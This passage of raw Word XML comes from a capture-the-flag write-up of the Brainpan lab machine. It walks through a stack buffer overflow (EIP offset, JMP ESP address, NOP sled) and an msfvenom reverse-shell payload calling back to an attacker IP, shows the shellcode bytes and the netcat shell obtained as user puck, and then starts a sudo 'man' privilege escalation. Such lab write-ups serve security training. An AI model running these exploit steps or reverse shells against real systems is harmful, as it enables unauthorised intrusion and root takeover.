          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0041289E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Decoding the hex (little-endian format) to utf-8</w:t>
      </w:r>
      <w:r w:rsidR="007D5DE9" w:rsidRPr="0041289E">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C6AD89" w14:textId="3FEF2F8B" w:rsidR="3EFF00EC" w:rsidRDefault="00D33A1E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1F93B896" wp14:editId="343A6987">
            <wp:extent cx="4118610" cy="540385"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2130870823" name="Picture 4" descr="bytes . fromhex( &#10;' 4Ar5' &#10;' 35724134 &#10;'ut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ytes . fromhex( &#10;' 4Ar5' &#10;' 35724134 &#10;'utf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8610" cy="540385"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="291901DB" w14:textId="2B79A6F6" w:rsidR="007D5DE9" w:rsidRPr="00D90155" w:rsidRDefault="007D5DE9" w:rsidP="3EFF00EC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D90155">
        <w:rPr>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Matching the revealed utf-8 pattern to the cyclic pattern to find the exact offset:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0DC468" w14:textId="41A0F587" w:rsidR="00D33A1E" w:rsidRDefault="00D33A1E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A564B23" wp14:editId="2B644B14">
            <wp:extent cx="3172460" cy="612140"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="1875447256" name="Picture 5" descr="kali) &#10;L-$ msf-pattern_ &#10;Exact match &#10;offset -l &#10;at offset &#10;1500 &#10;524 &#10;4Ar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li) &#10;L-$ msf-pattern_ &#10;Exact match &#10;offset -l &#10;at offset &#10;1500 &#10;524 &#10;4Ar5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2460" cy="612140"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="32700071" w14:textId="2C207BA0" w:rsidR="00AD04A2" w:rsidRDefault="007D5DE9" w:rsidP="3EFF00EC">
      <w:r>
        <w:t>The EIP offset is 524</w:t>
      </w:r>
      <w:r w:rsidR="00DB1515">
        <w:t>. We add that to the offset variable in the exploit script and then look for bad characters, none of which are found except the default null byte (</w:t>
      </w:r>
      <w:r w:rsidR="00DB1515" w:rsidRPr="00035DA1">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x00</w:t>
      </w:r>
      <w:r w:rsidR="00DB1515">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003A5D3F">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774234B0" w14:textId="106AF509" w:rsidR="002F776C" w:rsidRDefault="00245427" w:rsidP="00F4622A">
      <w:pPr>
        <w:pageBreakBefore/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Looking for a </w:t>
      </w:r>
      <w:r w:rsidRPr="00C43C2B">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>JMP ESP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> instruction within the binary reveals this address</w:t>
      </w:r>
      <w:r w:rsidR="007478B9">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FCC8381" w14:textId="0C7278DA" w:rsidR="00B16881" w:rsidRDefault="00B16881" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1E92FDCB" wp14:editId="701D3BEC">
            <wp:extent cx="6858000" cy="3440430"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:docPr id="1435478275"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8275" name="Picture 1" descr="A computer screen with green text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6858000" cy="3440430"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D73698" w14:textId="651C6ACD" w:rsidR="007478B9" w:rsidRDefault="00B16881" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">The address </w:t>
      </w:r>
      <w:r w:rsidRPr="00635A65">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0x311712f3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> can be used to overwrite the EIP, causing the program to jump back to the stack and consequently execute the malicious payload. We add that to the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00125663" w:rsidRPr="00125663">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>retn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D506D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>variable of the exploit script.</w:t>
      </w:r>
      <w:r w:rsidR="00D506D1">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E63C2C" w14:textId="3D19277E" w:rsidR="00D506D1" w:rsidRDefault="00D506D1" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69902309" wp14:editId="08804D11">
            <wp:extent cx="2289810" cy="1256030"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="1959773764" name="Picture 6" descr="prefix &#10;offset &#10;524 &#10;overflow &#10;&quot;A&quot; * offset &#10;retn &#10;Eadding &#10;payload &#10;postf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fix &#10;offset &#10;524 &#10;overflow &#10;&quot;A&quot; * offset &#10;retn &#10;Eadding &#10;payload &#10;postfix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9810" cy="1256030"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D5F27C" w14:textId="1ABC8DA6" w:rsidR="00FE742B" w:rsidRDefault="00D506D1" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">We </w:t>
      </w:r>
      <w:r w:rsidR="00F4252A">
        <w:t xml:space="preserve">change the IP address variable value to </w:t>
      </w:r>
      <w:r w:rsidR="00A07A33">
        <w:t>the target system</w:t>
      </w:r>
      <w:r w:rsidR="00A07A33">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00A07A33">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00F4252A">
        <w:t xml:space="preserve"> address, </w:t>
      </w:r>
      <w:r w:rsidR="00DC0099">
        <w:t>add some No-op (</w:t>
      </w:r>
      <w:r w:rsidR="00125663">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\x9</w:t>
      </w:r>
      <w:r w:rsidR="00DC0099" w:rsidRPr="00125663">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00DC0099">
        <w:t xml:space="preserve">) padding to the </w:t>
      </w:r>
      <w:r w:rsidR="00125663" w:rsidRPr="00125663">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>padding</w:t>
      </w:r>
      <w:r w:rsidR="00125663">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DC0099">
        <w:t xml:space="preserve">variable, </w:t>
      </w:r>
      <w:r>
        <w:t>generate the reverse shell payload</w:t>
      </w:r>
      <w:r w:rsidR="00F4252A">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">and assign it to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00125663">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> variable</w:t>
      </w:r>
      <w:r w:rsidR="00FE742B">
        <w:t xml:space="preserve"> in the exploit script</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C5DDC4" w14:textId="089239A6" w:rsidR="00FE742B" w:rsidRDefault="00FE742B" w:rsidP="00F4622A">
      <w:pPr>
        <w:pageBreakBefore/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Generating the shellcode:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187F9699" w14:textId="72C474E8" w:rsidR="004853ED" w:rsidRDefault="004853ED" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="513E5314" wp14:editId="1D18882A">
            <wp:extent cx="6858000" cy="2476500"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1209966866" name="Picture 7" descr="—'Des ktop/THM/Brai n pan/bof J &#10;L-$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.29.137 &#10;LPORT=443 EXITFUNC=thread &#10;[-] No platform was selected, choosing Msf :: Platform:: Linux from the payload &#10;[-] No arch selected, selecting arch: x86 from the payload &#10;Found 12 compatible encoders &#10;Attempting to encode payload with 1 iterations of x86/shikata_ga_nai &#10;x86/shikata_ga_nai succeeded with size 95 (iteration=ø) &#10;x86/shikata_ga_nai chosen with final size 95 &#10;Payload size: 95 bytes &#10;b&quot;&quot; &#10;b &quot;\xøø&quot; &#10;-f python &#10;Final &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;size of python file: 479 bytes &#10;b&quot; Xx58&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 ktop/THM/Brai n pan/bof J &#10;L-$ msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.6.29.137 &#10;LPORT=443 EXITFUNC=thread &#10;[-] No platform was selected, choosing Msf :: Platform:: Linux from the payload &#10;[-] No arch selected, selecting arch: x86 from the payload &#10;Found 12 compatible encoders &#10;Attempting to encode payload with 1 iterations of x86/shikata_ga_nai &#10;x86/shikata_ga_nai succeeded with size 95 (iteration=ø) &#10;x86/shikata_ga_nai chosen with final size 95 &#10;Payload size: 95 bytes &#10;b&quot;&quot; &#10;b &quot;\xøø&quot; &#10;-f python &#10;Final &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;buf &#10;size of python file: 479 bytes &#10;b&quot; Xx58&quo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476500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A0D12A" w14:textId="11B91AE3" w:rsidR="00FE742B" w:rsidRDefault="00FE742B" w:rsidP="3EFF00EC">
      <w:r>
        <w:t>Adding it to the script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA4CA3D" w14:textId="6CBA4974" w:rsidR="3EFF00EC" w:rsidRDefault="004853ED" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="492BFC6A" wp14:editId="50BE2979">
            <wp:extent cx="3697356" cy="2132964"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="398361355" name="Picture 8" descr="port &#10;&quot;1ø.1ø.87.26&quot; &#10;9999 &#10;prefix &#10;offset &#10;524 &#10;overflow &#10;&quot;A&quot; * offset &#10;retn &#10;padding &#10;payload &#10;payload &#10;payload &#10;payload &#10;payload &#10;payload * &#10;payload * &#10;payload * &#10;payload &#10;postfix &#10;&quot;\x90&quot; * 16 &#10;&quot;\xbd\xa2\xf7\x48\x69\xd9\xcb\xd9\x74\x24\xf4\x58&quot; &#10;&quot;\xf9\xaa\x9c\x3b\xdd\xdc\xbc\x68\xa2\x71\x29\x8c&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rt &#10;&quot;1ø.1ø.87.26&quot; &#10;9999 &#10;prefix &#10;offset &#10;524 &#10;overflow &#10;&quot;A&quot; * offset &#10;retn &#10;padding &#10;payload &#10;payload &#10;payload &#10;payload &#10;payload &#10;payload * &#10;payload * &#10;payload * &#10;payload &#10;postfix &#10;&quot;\x90&quot; * 16 &#10;&quot;\xbd\xa2\xf7\x48\x69\xd9\xcb\xd9\x74\x24\xf4\x58&quot; &#10;&quot;\xf9\xaa\x9c\x3b\xdd\xdc\xbc\x68\xa2\x71\x29\x8c&quo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7666" cy="2144680"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5794563D" w14:textId="7458D30A" w:rsidR="00F4252A" w:rsidRDefault="006D6937" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">Sending the exploit </w:t>
      </w:r>
      <w:r w:rsidR="009A0FE0">
        <w:t xml:space="preserve">to the server </w:t>
      </w:r>
      <w:r>
        <w:t>returns a shell</w:t>
      </w:r>
      <w:r w:rsidR="00904749">
        <w:t xml:space="preserve"> as user </w:t>
      </w:r>
      <w:r w:rsidR="00904749">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00904749">
        <w:t>puck</w:t>
      </w:r>
      <w:r w:rsidR="00904749">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to the netcat listener on </w:t>
      </w:r>
      <w:r w:rsidR="0046540C">
        <w:t>port</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 443</w:t>
      </w:r>
      <w:r w:rsidR="0046540C">
        <w:t xml:space="preserve"> of the attacking machine</w:t>
      </w:r>
      <w:r w:rsidR="00C35C9A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022EFD5" w14:textId="6207C52E" w:rsidR="004252DF" w:rsidRDefault="004252DF" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="31F78349" wp14:editId="2E7950CF">
            <wp:extent cx="7184573" cy="1955800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="1988851521" name="Picture 9" descr="(kali@ &#10;—'Desktop/THM/Brainpan/bof &#10;$ ./overflow_test.py &#10;Sending evil buffer &#10;Done ! &#10;(kali@ &#10;—'Desktop/TW/Brainpan/bof &#10;(kali@ &#10;—'Desktop/TW/Brainpan/bof &#10;$ nc -Ivp 443 &#10;listening on [any] 443 &#10;10.10.87.26: inverse host lookup failed: Unknown host &#10;connect to [10.6.29.137] from (UNKNOWN) [10.10.87.26] 48313 &#10;whoami &#10;puck &#10;id &#10;Ip a s &#10;to: mtu 16436 qdisc noqueue state UNKNOWN &#10;link/loopback brd &#10;inet 127.ø.ø.1/8 scope host 10 &#10;:: 1/128 scope host &#10;inet6 &#10;valid_lft forever preferred_lft forever &#10;ethø: mtu 9001 qdisc pfifo_fast state UP glen 1000 &#10;link/ether brd &#10;inet 10.10.87.26/16 brd 10.10.255.255 scope global etho &#10;inet6 fe80 :: e5:74ff:fe55:7811/64 scope link &#10;valid_lft forever preferred_lft fore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li@ &#10;—'Desktop/THM/Brainpan/bof &#10;$ ./overflow_test.py &#10;Sending evil buffer &#10;Done ! &#10;(kali@ &#10;—'Desktop/TW/Brainpan/bof &#10;(kali@ &#10;—'Desktop/TW/Brainpan/bof &#10;$ nc -Ivp 443 &#10;listening on [any] 443 &#10;10.10.87.26: inverse host lookup failed: Unknown host &#10;connect to [10.6.29.137] from (UNKNOWN) [10.10.87.26] 48313 &#10;whoami &#10;puck &#10;id &#10;Ip a s &#10;to: mtu 16436 qdisc noqueue state UNKNOWN &#10;link/loopback brd &#10;inet 127.ø.ø.1/8 scope host 10 &#10;:: 1/128 scope host &#10;inet6 &#10;valid_lft forever preferred_lft forever &#10;ethø: mtu 9001 qdisc pfifo_fast state UP glen 1000 &#10;link/ether brd &#10;inet 10.10.87.26/16 brd 10.10.255.255 scope global etho &#10;inet6 fe80 :: e5:74ff:fe55:7811/64 scope link &#10;valid_lft forever preferred_lft foreve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9514" cy="1976201"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA76293" w14:textId="26B1032A" w:rsidR="004252DF" w:rsidRDefault="00E91D43" w:rsidP="00E81FB2">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc141061110"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Escalation of Privileges to Root:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w14:paraId="051E9F1D" w14:textId="45A9B92E" w:rsidR="3EFF00EC" w:rsidRDefault="006E065F" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">After gaining initial access to the server as </w:t>
      </w:r>
      <w:r w:rsidR="00E81FB2" w:rsidRPr="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>puck</w:t>
      </w:r>
      <w:r>
        <w:t>, the next step is escalating privileges to root</w:t>
      </w:r>
      <w:r w:rsidR="000010ED">
        <w:t xml:space="preserve">. Checking the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="000010ED" w:rsidRPr="006730A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000010ED">
        <w:t xml:space="preserve"> permissions for </w:t>
      </w:r>
      <w:r w:rsidR="000010ED" w:rsidRPr="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>puck</w:t>
      </w:r>
      <w:r w:rsidR="000010ED">
        <w:t xml:space="preserve"> reveals a potential privilege escalation vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76AAE7C3" w14:textId="069AD6F7" w:rsidR="00940F9E" w:rsidRDefault="00940F9E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3647D3AE" wp14:editId="756C1FEF">
            <wp:extent cx="6369050" cy="1510665"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="176227797" name="Picture 10" descr="puckabrainpan: /home/puck$ sudo -1 &#10;sudo -l &#10;Matching Defaults entries for puck on this host: &#10;env_reset, mail_badpass, &#10;: /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin &#10;User puck may run the following commands on this host: &#10;(root) NOPASSWD: /home/anansi/bin/anansi_util &#10;puckabrainpan : /home/pu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ckabrainpan: /home/puck$ sudo -1 &#10;sudo -l &#10;Matching Defaults entries for puck on this host: &#10;env_reset, mail_badpass, &#10;: /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin &#10;User puck may run the following commands on this host: &#10;(root) NOPASSWD: /home/anansi/bin/anansi_util &#10;puckabrainpan : /home/puck$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9050" cy="1510665"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A648CE3" w14:textId="2C565D4E" w:rsidR="00940F9E" w:rsidRDefault="00940F9E" w:rsidP="3EFF00EC">
      <w:r>
        <w:t xml:space="preserve">User </w:t>
      </w:r>
      <w:r w:rsidR="00E81FB2" w:rsidRPr="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>puck</w:t>
      </w:r>
      <w:r w:rsidR="00E81FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">can execute </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="00E81FB2" w:rsidRPr="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00E81FB2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">as root with no password requirement. Running the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006730A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="006730A9" w:rsidRPr="00E81FB2">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>nansi_util</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006730A9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">binary with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006730A9" w:rsidRPr="006730A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> reveals the following </w:t>
      </w:r>
      <w:r w:rsidR="00AB28CD">
        <w:t>actions</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AADD47" w14:textId="277BC2E5" w:rsidR="00940F9E" w:rsidRDefault="00940F9E" w:rsidP="3EFF00EC">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FEFFB65" wp14:editId="095C190E">
            <wp:extent cx="4444779" cy="1167362"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="221466464" name="Picture 11" descr="puckabrainpan: /home/puck$ sudo /home/anansi/bin/anansi_util &#10;sudo /home/anansi/bin/anansi_util &#10;Usage: /home/anansi/bin/anansi_util [action] &#10;Where [action] is one of: &#10;network &#10;proclist &#10;manual [command] &#10;puckabrainpan : /home/pu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ckabrainpan: /home/puck$ sudo /home/anansi/bin/anansi_util &#10;sudo /home/anansi/bin/anansi_util &#10;Usage: /home/anansi/bin/anansi_util [action] &#10;Where [action] is one of: &#10;network &#10;proclist &#10;manual [command] &#10;puckabrainpan : /home/puck$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4779" cy="1167362"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BEC7FD" w14:textId="140E323C" w:rsidR="00902E27" w:rsidRDefault="00902E27" w:rsidP="006730A9">
      <w:r>
        <w:t xml:space="preserve">The last option (manual) runs the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006730A9">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>man</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> command as root. </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="00902E27">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>GTFOBins</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> details various ways to escalate privileges through the man command </w:t>
      </w:r>
      <w:r w:rsidR="00845A6A">
        <w:t xml:space="preserve">(if ran with temporary escalated privileges, such as </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00845A6A" w:rsidRPr="008D6B27">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00845A6A">
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49556574" w14:textId="3F3FBF4D" w:rsidR="0087064E" w:rsidRDefault="005753A8" w:rsidP="00902E27">
      <w:pPr>
        <w:spacing w:before="240"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Using one of the methods, we run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008D6B27">
